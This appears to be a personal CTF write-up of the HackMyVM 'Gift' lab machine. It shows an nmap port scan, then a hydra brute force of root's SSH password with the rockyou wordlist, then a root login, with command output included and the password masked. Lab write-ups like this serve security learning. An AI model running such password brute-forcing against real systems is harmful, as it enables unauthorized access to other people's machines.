NOTES ABOUT Gift
[ 2022-10-20 ] [ HackMyVM / Gift ]Status: Rooted
Skills: Port Scanning, Brute Force
Tools: nmap, ssh, hydra
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.32
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open http nginx
|_http-title: Site doesn\'t have a title (text/html).
GETTING IN & AUTO-ROOT
$ curl http://10.0.2.32
Dont Overthink. Really, Its simple.
<!-- Trust me -->
$ hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.32 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-20 20:27:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.0.2.32:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 10.0.2.32 login: root password: ******
$ ssh root@10.0.2.32
root@10.0.2.32\'s password:
IM AN SSH SERVER
gift:~# ls
root.txt user.txt
gift:~# poweroff